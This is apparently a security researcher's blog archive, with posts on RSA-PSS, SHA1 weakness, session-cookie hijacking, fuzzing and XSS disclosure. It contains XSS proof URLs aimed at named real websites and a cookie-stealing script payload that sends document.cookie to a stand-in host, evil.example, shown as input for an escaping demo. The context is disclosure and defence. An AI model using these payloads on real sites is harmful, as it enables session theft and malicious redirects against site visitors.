Entries tagged as security
Friday, May 14. 2010
I got selected for this year's Google Summer of Code with a project to implement RSA-PSS in the nss library. RSA-PSS will also be the topic of my diploma thesis, so I thought I'd write some lines about it.
RSA is, as you probably know, the most widely used public key cryptography algorithm. It can be used for signing and encryption; RSA-PSS is about signing (something similar, RSA-OAEP, exists for encryption, but that's not my main topic).
The formula for the RSA algorithm is S = M^k mod N (S is the signature, M the input, k the private key and N the product of two big prime numbers). One important thing is that M is not the message itself, but some encoding of the message. A simple way of doing this encoding is using a hash function, for example SHA256. This is basically how old standards (like PKCS #1 1.5) worked. While no attacks exist against this scheme, it's believed that it can be improved. One reason is that while the RSA function accepts an input as large as N (the same length as the key size, for example 2048/4096 bit), hash functions produce much smaller outputs (something like 160/256 bit).
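Just to make the formula tangible, here is the raw textbook RSA operation with the classic toy numbers (p=61, q=53; far too small to be secure, and with the encoding step left out entirely), sketched in Python:

N, e, d = 3233, 17, 2753          # toy modulus and exponents; d plays the role of "k" above
M = 65                            # the encoded message representative, must be smaller than N
S = pow(M, d, N)                  # signing: S = M^d mod N
assert pow(S, e, N) == M          # verification with the public exponent recovers M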
An improved encoding scheme is the Probabilistic Signature Scheme (PSS) (Bellare/Rogaway 1996/1998). PSS is "provably secure". That does not mean the resulting scheme is unconditionally secure (that's impossible with today's math), but that it is provably as secure as the underlying RSA function and the hash function used (in the so-called "random oracle model"). PSS is standardized in PKCS #1 2.1 (republished as RFC 3447). So PSS in general is a good idea as a security measure, but as there is no real pressure to implement it, it's still not used very much. Just as an example, the new DNSSEC resource records published last year still use the old PKCS #1 1.5 standard.
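The project is about implementing this in nss, but just to show what creating and verifying a PSS signature looks like from an application's point of view, here is a minimal sketch assuming the Python cryptography package (not nss, and not how the nss API will look):

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)
signature = key.sign(b"some message", pss, hashes.SHA256())                 # RSA-PSS signature creation
key.public_key().verify(signature, b"some message", pss, hashes.SHA256())  # raises an exception on failure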
For SSL/TLS, standards to use PSS exist (RFC 4055, RFC 5756), but implementations are widely lacking. Just recently, openssl gained support for PSS verification. The only implementation of signature creation I'm aware of is the Java library bouncycastle (yes, this forced me to write some lines of Java code).
The nss library is used by the Mozilla products (Firefox, Thunderbird), so an implementation there is crucial for a more widespread use of PSS.
Monday, February 1. 2010
At least since 2005 it has been well known that the cryptographic hash function SHA1 is seriously flawed and that it's only a matter of time until it is broken. However, it's still widely used, and it can be expected that it'll stay in use long enough to allow real-world attacks (as happened with MD5 before). NIST (the US National Institute of Standards and Technology) suggests not to use SHA1 after 2010; the German BSI (Bundesamt für Sicherheit in der Informationstechnik) says it should have been phased out by the end of 2009.
Probably the most widely used encryption protocol is SSL. It can operate on top of many other internet protocols and is, for example, widely used for online banking.
As SSL is a pretty complex protocol, it needs hash functions in various places; here I'm just looking at one of them: the signatures created by the certificate authorities. Every SSL certificate is signed by a CA. Even if you generate SSL certificates yourself, they are self-signed, meaning that the certificate is its own CA. From what I know, despite the suggestions mentioned above, no big CA will give you certificates signed with anything better than SHA1. You can check this with:
openssl x509 -text -in [your ssl certificate]
Look for "Signature Algorithm". It'll most likely say sha1WithRSAEncryption. If your CA is good, it'll show sha256WithRSAEncryption. If your CA is really bad, it may show md5WithRSAEncryption.
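If you prefer to check programmatically, the same information is easy to get; here's a small sketch assuming a reasonably recent version of the Python cryptography package (cert.pem stands for whatever certificate you want to inspect):

from cryptography import x509

# print the hash algorithm the CA used to sign this certificate
with open("cert.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())
print(cert.signature_hash_algorithm.name)   # e.g. "sha1", "sha256" or "md5"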
When asking for SHA256 support, you often get the answer that software still has problems with it and it's not ready yet. When asking for more information, I never got answers. So I tried it myself. On an up-to-date Apache webserver with mod_ssl, it was no problem to install a SHA256-signed certificate based on a SHA256-signed test CA. All browsers I've tried (Firefox 3.6, Konqueror 4.3.5, Opera 10.10, IE8 and even IE6) had no problem with it. You can check it out at https://sha2.hboeck.de/. You will get a certificate warning (obviously, as it's signed by my own test CA), but you'll be able to view the page. If you want to test it without warnings, you can also import the CA certificate.
I'd be interested if this causes any problems (on server or on client side), so please leave a comment if you are aware of any incompatibilities.
Update: By request in the comments, I've also created a SHA512 testcase.
Update 2: StartSSL wrote me that they tried providing SHA256 certificates about a year ago and ran into too many problems - they weren't very specific, but they mentioned that older Windows XP and Windows 2003 Server versions may have problems.
Thursday, March 5. 2009
I recently had contact with the AOK Berlin (a German public health insurance provider) via email.
My surprise was considerable when I received a mail from them that was PGP-encrypted. Mind you, I wasn't dealing with some security or IT department, but with ordinary customer service. Since my initial contact happened via a web form, no mail signature of mine had reached them, so I can only assume that their mail system automatically looked up my key on a keyserver and used it. Or a motivated employee got it from my website.
I can hardly imagine that all mails to addresses for which keys exist get encrypted automatically, first because that would probably create a considerable support burden (it happens to me often enough that I get messages along the lines of »please don't encrypt, I misplaced my key / don't have it with me right now«), and second because the mail addresses in the keys aren't verified in any way. However, there is, for example, the PGP Global Directory, which only accepts keys whose mail addresses are verified regularly. That currently seems to me the most plausible explanation.
Even though I don't know exactly how the AOK got hold of the right key, I find it commendable that, for a change, someone in an area that is highly sensitive for privacy reasons makes an effort towards encrypted communication on their own initiative.
Tuesday, January 13. 2009
In the last few weeks, I did a study research project at the EISS at the University of Karlsruhe. The subject was »Session Cookies and SSL«: investigating the problems that arise when trying to secure a web application with HTTPS while using session cookies.
I already wrote about this in the past, presenting vulnerabilities in various web applications.
One of the notable results is probably that ebay has no countermeasures against these issues at all, so it's pretty trivial to hijack a session (and use that to place bids and even change the address of the hijacked account).
Download »Session Cookies and SSL« (PDF, 317 KB)
Thursday, September 25. 2008
Recently, two publications raised awareness of a problem with SSL-secured websites.
If a website is configured to always forward traffic to SSL, one would assume that all traffic is safe and nothing can be sniffed. However, if an attacker is able to sniff network traffic and also has the ability to lure the victim to a crafted site (which can, e.g., be as simple as sending a »hey, read this, interesting text« message), he can force the victim's browser to open a plain HTTP connection. If the cookie does not have the secure flag set, the attacker can sniff the cookie and take over the session of the user (assuming the site uses some kind of cookie-based session, which is pretty standard in today's webapps).
The solution to this is that a webapp should always check whether the connection is SSL and set the secure flag accordingly. For PHP, this could look something like this:
// before session_start(): mark the session cookie as secure (and HttpOnly) when serving over HTTPS
if (!empty($_SERVER['HTTPS'])) session_set_cookie_params(0, '/', '', true, true);
I've recently investigated all web applications I'm using myself and reported the issue (Mantis / CVE-2008-3102, Drupal / CVE-2008-3661, Gallery / CVE-2008-3662, Squirrelmail / CVE-2008-3663). I have some more pending that I want to investigate further.
I call on security researchers to add this issue to their list of common things to look for. I find the Firefox extension CookieMonster very useful for this.
The result of my reports was quite mixed. While the gallery team took the issue very seriously (and even paid me a bounty for my report, many thanks for that), the drupal team thinks there is no issue and did nothing. The others have not released updates yet, but fixed the issue in their code.
And as a final word, I want to share a mail I got after posting the gallery issue to full disclosure:
for fuck's sake dude! half of the planet, military, government, financial sites suffer from this and the best you could come up with is a fucking photo album no one uses! do everybody a favor and die you lame fuck!
Sunday, September 7. 2008
I recently played around with the possibilities of fuzzing. It's a simple way to find bugs in applications.
What you do: you have some application that parses some kind of file format. You create lots (thousands) of files which contain small errors; the simplest approach is to just flip random bits. If the app crashes, you've found a bug, and it's quite likely a security-relevant one. This is especially critical for apps like mail scanners (antivirus), but it works for pretty much every app that parses foreign input. It works especially well on uncommon file formats, because their parsing code is often not well maintained.
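To make the idea concrete, a toy bit-flipping fuzzer could look roughly like the Python sketch below (some_parser and sample.bin are just placeholders; real tools are much more clever about this):

import random, subprocess

def fuzz_once(data, flips=8):
    # flip a handful of random bits in a copy of the original file
    data = bytearray(data)
    for _ in range(flips):
        pos = random.randrange(len(data))
        data[pos] ^= 1 << random.randrange(8)
    return bytes(data)

original = open("sample.bin", "rb").read()
for i in range(1000):
    with open("fuzzed.bin", "wb") as f:
        f.write(fuzz_once(original))
    result = subprocess.run(["some_parser", "fuzzed.bin"])
    if result.returncode < 0:   # negative return code: killed by a signal, e.g. SIGSEGV
        print("crash in run", i)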
My fuzzing tool of choice is zzuf.
I am impressed and a bit shocked by how easy it is to find crashers and potential overflows in common, security-relevant applications. My latest discovery was a crasher in the chm parser of clamav.
Tuesday, April 29. 2008
I just read an article about the recent wordpress vulnerability (if you're running wordpress, please update to 2.5.1 NOW), and one point caught my attention: the attack uses MD5 collisions.
I wrote some articles about hash collisions a while back. Short introduction: a cryptographic hash function is a function into which you can put any data and get a unique, fixed-size value out. »Unique« in this case means that it's very hard to find two different inputs that map to the same hash value. If you can do that, the function should be considered broken.
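The fixed-size part is easy to see with Python's hashlib; whether the input is a few bytes or a megabyte, SHA256 always produces 256 bits (32 bytes):

import hashlib

print(hashlib.sha256(b"short input").hexdigest())
print(hashlib.sha256(b"x" * 1000000).hexdigest())
print(hashlib.sha256(b"short input").digest_size)   # always 32 bytes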
The MD5 function was broken some years back (2004), and it's more or less a question of time until the same happens to SHA1. There have been scientific results claiming that an attacker with enough money could build a supercomputer able to create collisions for SHA1. The evil thing is: due to the design of both functions, once you have one collision, you can create many more easily.
Although those facts are well known, SHA1 is still widely used (just have a look at your SSL connections or at the way the PGP web of trust works), and MD5 isn't dead either. The fact that a well-known piece of software has issues that depend on hash collisions should get some attention. Pretty much all security considerations for cryptographic protocols rely on the collision resistance of hash functions.
NIST plans to define new hash functions by 2012; until then it's probably a safe choice to stick with SHA256 or SHA512.
Monday, April 21. 2008
In the instant messaging world, encryption is a bit of a problem. There is no single standard that all clients share; mostly two methods of encryption are out there: pgp over jabber (as defined in the xmpp standard) and otr.
Most clients only support either otr (pidgin, adium) or pgp (gajim, psi), and for a long time I was looking for a solution where both methods work. psi has otr patches, but they didn't work when I tried them. kopete also has an otr plugin, but I've not tested that yet.
Today I found that there is an otr branch of gajim, which is my everyday client, so this would be great. As you can see in the picture, it seems to work on a connection with an ICQ user using pidgin.
I've created some ebuilds in my overlay (the code is stored in bazaar; I've copied the bzr eclass from the desktop effects overlay):
svn co https://svn.hboeck.de/overlay
Thursday, April 10. 2008
Today heise security reported that a growing number of old wordpress installations are being misused by spammers to improve their pagerank. I've more or less been waiting for something like that, because it's quite obvious: if you have an automated mechanism to exploit security holes in a popular web application, you can search for vulnerable installations with a search engine (google, the mighty hacktool), and usually it's quite trivial to detect both the application and its version.
This isn't only a wordpress thing; it can happen to pretty much every widespread web application. Wordpress had a lot of security issues recently and is very widespread, so it's an obvious choice. But other incidents like this will follow, and future ones will probably affect a wider range of web applications.
The conclusion is quite simple: if you're installing a web application yourself, you are responsible for it! You need to look for security updates and you need to install them, or else you might be responsible for spammers' actions. And there's no »nobody is interested in my little blog« excuse, as these are not attacks against an individual page, but mass attacks.
For administrators, I wrote a little tool a while back with exactly such incidents in mind: freewvs. It checks the local filesystem for web applications and knows about vulnerabilities, so it'll tell you which web applications need updates. It already detects a whole bunch of apps, but more is always better, and if you'd like to help, I'd gladly accept patches for more applications (the format is quite simple).
With it, server administrators can check the webroots of their users and nag them if they have outdated cruft lying around.
Thursday, March 27. 2008
I got some spam in the comment fields of my blog that caught my interest.
A sample of what they looked like:
http://www.unicef.org/voy/search/search.php?q=some+advertising%3Cscript%3Eparent%2elocation%2ereplace%28%22http%3A%2F%2Fgoogle%2ede22%29%3C%2Fscript%3E
I've replaced the forwarding URL and the advertising words (because I don't want to draw attention to the spammers' pages). I got several similar spam comments over the following days, all with the same scheme: using a cross-site scripting vulnerability, mostly on pages that look trustworthy, to forward visitors to a page selling medical products.
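For readers who don't decode URL encoding in their heads: the payload is simply an injected script that redirects the page, roughly like this (decoded with Python, using my placeholder URL from above):

from urllib.parse import unquote

payload = "some+advertising%3Cscript%3Eparent%2elocation%2ereplace%28%22http%3A%2F%2Fgoogle%2ede%22%29%3C%2Fscript%3E"
print(unquote(payload))
# some+advertising<script>parent.location.replace("http://google.de")</script>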
This is probably a good reason why XSS should be fixed, no matter what the attack vectors are. It can always be used by spammers to exploit your page's fame/authority to advertise their services. The same goes for redirectors or frame injections. Some were already reported in public places (for the above, see here). I've re-reported them all, but got just one reply from a webmaster who fixed it. That's the reality on the internet today: even webmasters of famous public organizations don't seem to care about internet security.
For the record, the others:
http://adventisthealth.org/utilities/search.asp?Yider=<script>alert(1)</script>
http://www.loc.gov/rr/ElectronicResources/search.php?search_term=<script>alert(1)</script>
And thanks to iconfactory, they fixed their XSS.
Wednesday, February 27. 2008
This morning the Federal Constitutional Court handed down its ruling, and it did so in a way that lets everybody feel a little bit like a winner. Roughly, the ruling says that online searches are permissible in principle, but only under extremely restricted conditions and subject to judicial approval. The latter is unfortunately all too often seen as a cure-all against abuse, which sadly matches reality only very rarely.
The problem I experience in discussions about the so-called »online search« is that my main concerns only begin where the technical understanding of most other people (in particular of the deciding politicians) has long since ended. Today I'll attempt to spell out those concerns without leaving all the non-techies behind.
First of all, one has to get a rough grasp of what an »online search« is supposed to be. Usually it means breaking into someone else's computer system and retrieving or manipulating data there (I'll skip the finer distinctions between data seizure, source wiretapping and the like). The frequently cited comparison with a house search is problematic, because computers usually don't have a virtual »door«. In the real world, a door simply gets kicked in or the lock is bypassed in some other way (yes, there are more elegant methods, I know those too). That is not necessarily possible with a computer system, because there is nothing that can, if need be, be overcome with brute force (like a door).
To break into a system anyway, one usually makes use of security vulnerabilities. And here, in my view, we get to the core of the problem: how knowledge about security vulnerabilities is handled. In hacker slang, one sometimes distinguishes between whitehats (»good« hackers) and blackhats (»bad« hackers). Whitehats are those who use their knowledge about security vulnerabilities only to get them fixed, for example by informing the vendor of the system or software and publishing the vulnerability afterwards. Blackhats are those who use their knowledge of security vulnerabilities to break into other people's systems.
Now we have the somewhat unusual situation that the state wants to act as a blackhat, i.e. NOT publish security vulnerabilities, because it wants to use them for online searches. At this point it also becomes clear that the topic is relevant not only for those affected by a search, but for practically everyone. Where the state gets this information from would be an interesting question of its own.
This raises some interesting follow-up questions. Every now and then a computer virus manages to paralyze half of the economy (not too long ago a large share of Deutsche Post's computers were infected). In future cases of that kind, people will ask, not without justification, whether such an incident could have been prevented had the state shared its knowledge about security problems with the rest of humanity. What that means for potential damage claims is something an ambitious lawyer may want to look into some day.
Another aspect that opens up here, and possibly not an uninteresting one: the state is entering territory where certain rules don't necessarily apply the way they do elsewhere. To take up the house search example from above, as a rule a state can enforce a house search no matter how the occupants resist, for the simple reason that the state has an overwhelming repertoire of means of force at its disposal (at least that holds for Western European industrialized countries).
Now the state is getting into conflicts where this advantage suddenly vanishes. The state has no monopoly on what it is doing here. An »online search« is something the spammer, the terrorist or the after-hours hacker may be able to do just as well.
Tuesday, February 26. 2008
I recently took the new CAcert assurer test. Afterwards, one has to send an S/MIME-signed mail to get a PDF certificate.
I had the same problem as Bernd: the answer came in an RC2-encrypted S/MIME mail. I'm using kmail, kmail uses gpgsm for S/MIME, and gpgsm doesn't support RC2.
While this raises some obvious questions (Why is anyone in the world still using RC2? Why is anyone using S/MIME at all?), I was able to work around it without the hassle of installing thunderbird (which was Bernd's solution).
openssl supports RC2 and can handle S/MIME. And this did the trick:
openssl smime -decrypt -in [full mail] -inkey sslclientcert.key
It needed the full mail, which took me a while to figure out, because I first tried to decrypt only the attachment.
I want to share some thoughts about more advanced XSS issues, based on two vulnerability announcements I recently made.
The first is backend XSS. I think this hasn't been addressed very much; most probably all CMSes have this issue. If you have a CMS system (a blog also counts as a CMS here) with multiple users, there are various ways in which users can XSS each other. The most obvious one is that it's common practice for a CMS to give you some way to publish raw html content.
Assume you have a blog where multiple users are allowed to write articles. Alice writes an article; Eve doesn't like the content of that article. Eve can now write another article with some JavaScript crafted to steal Alice's cookie. As soon as Alice is logged in and views the front page with Eve's article, her cookie gets stolen, and Eve can hijack her account and manipulate her articles.
The solution is not that simple. To prevent the XSS, you'd have to make sure that there's absolutely no way to put raw html code on the page. Serendipity, for example, has a plugin called trustxss which should do exactly that, though there were many ways to circumvent it (at least all the ones I found should be fixed in 1.3-beta1, see the advisory here: CVE-2008-0124). All fields like username, user information etc. need to be escaped, and the default should be that users aren't allowed to post html. If a superuser enables html posting for another user, he should be warned about the security implications.
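The escaping itself is the easy part; the hard part is making sure it happens for every field. Just as an illustration, here's what it looks like with Python's html module (PHP's htmlspecialchars does the same job):

import html

# a typical cookie-stealing payload, rendered harmless by escaping the html metacharacters
payload = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
print(html.escape(payload))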
A quite different way would be separating front- and backend on different domains. I don't know of any popular CMS currently doing that, but it would prevent a lot of vulnerabilities: The website content is, e.g., located on www.mydomain.com, while the backend is on edit.mydomain.com. It would add complexity to the application setup, especially on shared hosting environments.
The second issue is XSS/CSRF in the installer. I'm not really sure how to classify these, as an open installer most probably has more security implications than just XSS. I recently discovered an XSS in the installer of moodle (CVE-2008-0123), which made me think about this.
I thought of a (real) scenario: I was sitting in a room with a group, discussing that we needed a webpage; we would take the domain somedomain.de and install some webapp there (in this case MediaWiki, where I found no such issues). I spontaneously started setting that up on my laptop. Other people in the room hearing the discussion could have sent me links triggering some kind of XSS/CSRF there. This probably isn't a very likely scenario, but still, I'd suggest preventing XSS/CSRF in the installers of web applications as well.
Friday, February 8. 2008
Over two years ago, it was announced that the security scanner nessus would no longer be free software starting with version 3.0. Soon after that, several forks were announced. For a long time, none of these fork projects produced any output.
openvas was one of those forks and, to my knowledge, the only one that ever produced any releases. It recently had 1.0 releases for all packages; I just added ebuilds to gentoo.
While openvas isn't perfect yet (many of the old plugins fail, because some files had to be removed due to unclear licensing), it's nice to see that we have a free, maintained security scanner again that will fill the gap left by nessus.
Friday, January 11. 2008
About one year ago, Sam Hocevar posted some results on tests with his fuzzing tool zzuf, which showed a large number of crashes in various applications, especially multimedia apps.
Crash bugs on invalid input very often lead to security issues, so this should be taken seriously.
Now, I took the liberty of having a look at how many of the issues found back then have been fixed. I used the most current versions in gentoo linux (testing/~x86 system), which tend to be quite up to date. I also cross-checked the crashes against other apps, as they often use the same or similar code.
It seems only the vlc devs did their homework (Sam Hocevar is part of the vlc team). Interestingly enough, even firefox seems to have had a gif crasher for a year.
gstreamer: crash by lol-ffplay.mpg, lol-gstreamer.m2v, lol-mplayer.m2v, lol-mplayer.mpg, lol-vlc.m2v, lol-vlc.mpg; endless loop by lol-ffplay.m2v, lol-xine.mpg
mplayer: hang by lol-mplayer.wmv; crash by lol-ffplay.flac, lol-mplayer.aac, lol-mplayer.mpg, lol-mplayer.ogg, lol-ogg123.flac, lol-vlc.aac, lol-xine.aac
xine: crash by lol-mplayer.wmv, lol-ffplay.m2v, lol-ffplay.ogg, lol-ffplay.wmv, lol-gstreamer.avi, lol-ogg123.flac, lol-vlc.aac, lol-xine.mpg
firefox: crash by lol-firefox.gif